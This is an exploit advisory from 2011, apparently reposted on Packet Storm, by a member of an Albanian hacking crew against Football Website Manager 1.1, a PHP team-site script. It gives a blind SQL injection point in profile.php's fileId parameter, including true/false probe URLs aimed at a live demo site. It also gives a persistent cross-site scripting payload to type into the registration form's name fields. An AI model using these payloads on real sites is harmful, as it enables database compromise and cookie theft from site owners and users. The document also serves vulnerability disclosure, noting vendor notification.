Football Website Manager version 1.1 suffers from cross site scripting and remote SQL injection vulnerabilities.
af3d7d3f9f8b8a2fa33915f2eee90058f00c76ed14b648348f48164e7ee9ad87=========================================================================
Football Website Manager PHP Script BSQL-i / Persistent XSS Vulnerability
==========================================================================
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
+=+=+= +=+=+=
+=+=+= /\ | | | | ________ _____ _____ __ _ __ +=+=+=
+=+=+= / \ | |__| | _____ / ______/ | _ \ | ____|\ \ / \ / / +=+=+=
+=+=+= / /\ \| |__| | /_____/ | | | |_) / | |__ \ \/ \/ / +=+=+=
+=+=+= / ____ \ | | | | |_______ | __\ \ | __| \ / +=+=+=
+=+=+= /_/ \_\| | | |________/ |_| \_\ | |_______\_____/_____ +=+=+=
+=+=+= |_____________________|+=+=+=
+=+=+= +=+=+=
+=+=+= X-n3t - **RoAd_KiLlEr** - The|Denny` - The_1nv1s1bl3 +=+=+=
+=+=+= +=+=+=
+=+=+= 0ne Nation , 0ne People , 0ne Culture , 0ne Language = Ethnic Albania +=+=+=
+=+=+= +=+=+=
+=+=+= ....::: | ALBANIAN HACKING CREW | :::.... 2011 +=+=+=
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
0 0
1 ########################################### 1
0 I'm **RoAd_KiLlEr** member from 1337 DAY Team 1
1 ########################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
[+]Title :.......Football Website Manager PHP Script BSQL-i / Persistent XSS Vulnerability
[+]Author :......**RoAd_KiLlEr**
[+]Tested on :...Win Xp Sp 2/3 | Apache 2.0.64 | PHP: 5.3.5
---------------------------------------------------------------------------
[~] Founded by **RoAd_KiLlEr**
[~] Team: Albanian Hacking Crew
[~] Contact: sukihack[at]gmail[dot]com
[~] Home: http://1337day.com/author/2447
[~] Vendor: http://www.nil.clan-hosts.net/cycsoftware/index.php
[~] Download CMS:http://www.nil.clan-hosts.net/cycsoftware/modules.php?op=modload&name=Downloads&file=index&req=getit&lid=2
[~] Version: 1.1
[~] License: GNU GPL
==========ExPl0iT3d by **RoAd_KiLlEr**==========
[+] Description:
Football Website Manager is a PHP script that allows you to create a website for a football (soccer) team in order to keep track of team info and league matches. It is menu driven so no HTML or programing knowledge is required.
It allows you to add teams in your division, add players to your squad, assign roles to each member (player, manager etc) add fixtures, then add results for your matches as well as other teams to keep the league table up to date.
You can also post news stories to the main page, assign rights to other players to post news or give them full access.
========================================
[ I ]. BSQL-i Vulnerability
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[P0C]: http://127.0.0.1/profile.php?fileId=[BLIND SQL INJECTION]
[L!v3 D3m0]:
http://www.nil.clan-hosts.net/fbdemo/profile.php?fileId=-113 <== FALSE :P
http://www.nil.clan-hosts.net/fbdemo/profile.php?fileId=113 <== TRUE :D
[ II ]. Persistent XSS Vulnerability
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
Persitent XSS egzists in the members area.
First go to any site,than click register http://127.0.0.1/register.php
In the area of your Username and Full Name write the javascript :D..
[At4ck Patt3rn]: "><script>alert(document.cookie)</script>
Than when you go to view your profile the script executes.
[+] TIME TABLE:
26 April 2011 - Vulnerability discovered.
26 April 2011 - Vendor Notified.
27 April 2011 - Advisory released.
===========================================================================================
[!] Albanian Hacking Crew
===========================================================================================
[!] **RoAd_KiLlEr**
===========================================================================================
[!] MaiL: sukihack[at]gmail[dot]com
===========================================================================================
[!] Greetz To : Ton![w]indowS | X-n3t | The|DennY` | THE_1NV1S1BL3 | KHG & All Albanian/Kosova Hackers
===========================================================================================
[!] Spec Th4nks: r0073r | indoushka | Sid3^effects | DoNnY | All 1337day Members | And All My Friendz
===========================================================================================
[!] Red n'black i dress eagle on my chest
It's good to be an ALBANIAN
Keep my head up high for that flag I die
Im proud to be an ALBANIAN
===========================================================================================
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed